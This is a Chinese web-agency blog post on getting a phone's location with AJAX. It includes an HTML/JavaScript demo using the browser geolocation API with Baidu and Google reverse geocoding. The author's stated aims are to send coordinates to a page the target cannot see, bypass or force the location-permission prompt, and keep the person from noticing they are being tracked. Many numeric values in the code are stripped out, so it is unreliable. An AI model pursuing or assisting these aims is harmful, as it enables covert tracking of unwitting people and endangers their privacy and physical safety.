這篇文章將為大家詳細講解有關(guān)ajax如何實現(xiàn)手機定位,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
創(chuàng)新互聯(lián)建站服務(wù)項目包括長島網(wǎng)站建設(shè)、長島網(wǎng)站制作、長島網(wǎng)頁制作以及長島網(wǎng)絡(luò)營銷策劃等。多年來,我們專注于互聯(lián)網(wǎng)行業(yè),利用自身積累的技術(shù)優(yōu)勢、行業(yè)經(jīng)驗、深度合作伙伴關(guān)系等,向廣大中小型企業(yè)、政府機構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案,長島網(wǎng)站推廣取得了明顯的社會效益與經(jīng)濟效益。目前,我們服務(wù)的客戶以成都為中心已經(jīng)輻射到長島省份的部分城市,未來相信會繼續(xù)擴大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任!
目前的版本只是demo,仍有幾個問題需要完善一下,問題如下:
1,如何將經(jīng)緯度等數(shù)據(jù)發(fā)送到被定位人看不到的頁面上。
2,如何繞過或或強制讓打開鏈接的人允許使用定位(彈窗)。
3,目前或取經(jīng)緯度后,要自行用谷歌地球去分析用戶位置(通過衛(wèi)星地圖定位并顯示),如何簡化這一部分,讓被定位者的經(jīng)緯度自動生成地圖圖片并一起導(dǎo)入到其他頁面(總之不能讓被定位者察覺自己被定位的這一事實)。
<!DOCTYPE HTML> <html> <head> <meta charset="utf-"> <meta name="viewport" content="width=device-width, initial-scale=, maximum-scale="> <title>demo..</title> <script type="text/javascript" src="http://libs.useso.com/js/jquery/../jquery.min.js"></script> <style type="text/css"> .demo{width:px; margin:px auto px auto} .geo{margin-top:px} .demo p{line-height:px; font-size:px} .demo p span,#baidu_geo,#google_geo{font-weight:bold} </style> </head> <body> <div id="main"> <div class="demo"> <p>地理坐標:<span id="latlon"></span></p> <div class="geo"> <p>百度地圖定位位置:</p> <p id="baidu_geo"></p> </div> <div class="geo"> <p>GOOGLE地圖定位位置:</p> <p id="google_geo"></p> </div> </div> </div> <script> function getLocation(){ if (navigator.geolocation){ navigator.geolocation.getCurrentPosition(showPosition,showError); }else{ alert("瀏覽器不支持地理定位。"); } } function showPosition(position){ $("#latlon").html("<br />緯度:"+position.coords.latitude +'<br />經(jīng)度:'+ position.coords.longitude); var latlon = position.coords.latitude+','+position.coords.longitude; //baidu var url = "http://api.map.baidu.com/geocoder/v/?ak=Cbdaebdbbbabceb&callback=renderReverse&location="+latlon+"&output=json&pois="; $.ajax({ type: "GET", dataType: "jsonp", url: url, beforeSend: function(){ $("#baidu_geo").html('正在定位...'); }, success: function (json) { if(json.status==){ $("#baidu_geo").html(json.result.formatted_address); } }, error: function (XMLHttpRequest, textStatus, errorThrown) { $("#baidu_geo").html(latlon+"地址位置獲取失敗"); } }); //google var url = 'http://maps.google.cn/maps/api/geocode/json?latlng='+latlon+'&language=CN'; $.ajax({ type: "GET", url: url, beforeSend: function(){ $("#google_geo").html('正在定位...'); }, success: function (json) { if(json.status=='OK'){ var results = json.results; $.each(results,function(index,array){ if(index==){ $("#google_geo").html(array['formatted_address']); } }); } }, error: function (XMLHttpRequest, textStatus, errorThrown) { $("#google_geo").html(latlon+"地址位置獲取失敗"); } }); } function showError(error){ switch(error.code) { case error.PERMISSION_DENIED: alert("定位失敗,用戶拒絕請求地理定位"); break; case error.POSITION_UNAVAILABLE: alert("定位失敗,位置信息是不可用"); break; case error.TIMEOUT: alert("定位失敗,請求獲取用戶位置超時"); break; case error.UNKNOWN_ERROR: alert("定位失敗,定位系統(tǒng)失效"); break; } } getLocation(); </script> </body> </html>
關(guān)于“ajax如何實現(xiàn)手機定位”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
網(wǎng)頁題目:ajax如何實現(xiàn)手機定位
網(wǎng)頁URL:http://aaarwkj.com/article18/pjdpdp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供商城網(wǎng)站、小程序開發(fā)、網(wǎng)站收錄、虛擬主機、微信小程序、定制網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)